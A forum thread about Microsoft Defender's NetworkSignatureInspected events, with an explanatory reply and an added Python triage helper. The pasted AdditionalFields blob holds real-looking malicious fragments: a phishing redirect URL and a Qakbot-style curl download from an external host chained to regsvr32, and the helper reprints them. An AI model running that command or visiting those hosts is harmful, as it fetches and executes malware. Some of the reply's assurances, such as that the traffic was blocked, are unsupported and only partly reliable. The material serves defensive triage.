
MrD
Copper Contributor
Nov 28, 2025

NetworkSignatureInspected

Hi,

Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content.

I've read this article, so understand the basics of the function:

Enrich your advanced hunting experience using network layer signals from Zeek

I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices.

Can anyone provide any clarity on the contents of AdditionalFields where the ActionType is NetworkSignatureInspected, which references, for example, CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://


Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced.

Any assistance with rationalising this would be great, thanks.


1 Reply

  • Ankit365
    Iron Contributor

    That’s a really good and subtle observation, and what you’re seeing is actually expected behavior rather than evidence of an active compromise. As of December 2025, entries in DeviceTimeline (or Advanced Hunting) with ActionType = NetworkSignatureInspected are generated by the network inspection engine in Microsoft Defender for Endpoint (MDE). This engine integrates lightweight Zeek-based inspection telemetry into the endpoint sensor. These records represent passive detections of network-layer patterns that Defender recognized and analyzed, not necessarily blocked or executed payloads.

    The AdditionalFields content you’re seeing is a raw snippet of payload data that matched a known network signature, in your case one related to CVE-2021-44228 (Log4Shell) and some strings commonly used by Qakbot or phishing scripts. Defender is flagging that pattern because its sensor saw traffic that resembled an exploit attempt, perhaps a malformed HTTP request or an external scan. It doesn’t mean the device executed malicious code or contacted those domains. The sensor simply captured the payload signature while inspecting inbound or outbound packets. The same pattern appearing across multiple devices confirms that it was a signature match from a scan or external probe, not a localized infection.

    Because these network inspection events don’t always map to full detections, they don’t raise an alert or show up in Defender’s threat summary. They are primarily included to enrich hunting data and give you network visibility at the packet level. If you check the related device’s DeviceNetworkEvents, you likely won’t see any confirmed connections to those URLs because the request never completed or was intercepted at the inspection layer. The absence of alerts or follow-up activity means Defender treated it as benign background noise or blocked the traffic before any payload was delivered.

    Basically, NetworkSignatureInspected entries indicate that Defender’s network protection module analyzed traffic matching a known signature but didn’t find evidence of compromise. The payloads in the AdditionalFields are fragments of suspicious data observed on the wire, not code that executed on the device. They are useful for correlation and threat hunting but don’t require remediation unless accompanied by alerts or process execution events. Please hit like if you like the solution.
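A small triage helper, added here as an example and not part of either post, that does mechanically what the reply recommends: pull the embedded detection names and URLs out of the AdditionalFields blob, show how much of it is non-printable packet data once percent-decoded, and check the extracted hosts against the device's DeviceNetworkEvents rows. SAMPLE_SNIPPET is an abbreviated copy of the blob quoted in the question; the DeviceNetworkEvents rows are constructed; the SignatureName and SamplePacketContent JSON keys are taken from the Zeek article's description of the field and are an assumption to verify against your own tenant's schema.

```python
"""Triage helper for NetworkSignatureInspected rows exported from Defender.

Added example, not code from the post or from Microsoft. SAMPLE_SNIPPET is an
abbreviated copy of the AdditionalFields blob quoted in the question;
SAMPLE_EVENTS are constructed DeviceNetworkEvents rows for the same device.
"""
import json
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Abbreviated copy of the posted payload snippet (constructed sample input).
SAMPLE_SNIPPET = (
    '${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*'
    '<title>redirecting...</title><script>window.location.href='
    '"https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";'
    '%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10'
    '&&curl.exe--output%25programdata%25\\xlhkbo\\ff\\up2iob.iozv.zm'
    'https://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"'
    '%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10'
)

# Constructed DeviceNetworkEvents rows: ordinary traffic only, so no hits expected.
SAMPLE_EVENTS = [
    {"ActionType": "ConnectionSuccess", "RemoteUrl": "intranet.example.internal",
     "RemoteIP": "192.0.2.10"},
    {"ActionType": "ConnectionSuccess",
     "RemoteUrl": "https://updates.example.com/catalog.xml", "RemoteIP": "198.51.100.7"},
]

# Detection names sit inline in the sample as "#SCPT:Trojan:BAT/Qakbot.RVB01!MTB".
SIG_RE = re.compile(r"#SCPT:([A-Za-z0-9:/._-]+![A-Z]+)")
URL_RE = re.compile(r"https?://[^\s\"'<>#&]+")


def parse_additional_fields(raw):
    """Return (signature_name, packet_sample) from an AdditionalFields value.

    In an export the column is JSON; the Zeek article describes SignatureName and
    SamplePacketContent keys (assumption: verify against your tenant's schema).
    A bare blob, as pasted in the question, is treated as the sample itself.
    """
    try:
        fields = json.loads(raw)
    except ValueError:
        return None, raw
    if not isinstance(fields, dict):
        return None, raw
    return fields.get("SignatureName"), fields.get("SamplePacketContent", "")


def extract_signature_names(sample):
    """Detection names embedded inline in the sampled packet content."""
    return SIG_RE.findall(sample)


def extract_hosts(sample):
    """Distinct hostnames from URLs in the sample, in order of appearance."""
    hosts = []
    for url in URL_RE.findall(sample):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def count_nonprintable(data):
    """Bytes outside printable ASCII (tab/CR/LF excluded): a rough binary measure."""
    return sum(1 for b in data if (b < 0x20 or b >= 0x7F) and b not in (0x09, 0x0A, 0x0D))


def _host_of(remote_url):
    # RemoteUrl may be a bare hostname or a full URL.
    if "://" in remote_url:
        return (urlsplit(remote_url).hostname or "").lower()
    return remote_url.split("/", 1)[0].lower()


def matched_hosts(hosts, events):
    """Hosts from the sample that the device actually connected to."""
    seen = {_host_of(e.get("RemoteUrl", "")) for e in events}
    seen.discard("")
    return [h for h in hosts if h in seen]


def triage(raw_additional_fields, events):
    """Summarise one NetworkSignatureInspected row against the device's network events."""
    signature, sample = parse_additional_fields(raw_additional_fields)
    decoded = unquote_to_bytes(sample)
    hosts = extract_hosts(sample)
    return {
        "signature_name": signature,
        "inline_signatures": extract_signature_names(sample),
        "hosts": hosts,
        "decoded_length": len(decoded),
        "nonprintable_bytes": count_nonprintable(decoded),
        "matched_hosts": matched_hosts(hosts, events),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SNIPPET, SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

On a real export, pass the AdditionalFields column value and the same device's DeviceNetworkEvents rows (both obtainable from Advanced Hunting) to triage(). An empty matched_hosts list is the programmatic form of the "no hits" observation in the question; the inline_signatures list shows that the strings in Defender's detection-name format are embedded in the sampled packet bytes themselves, which is why they read like a detection while no alert exists.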
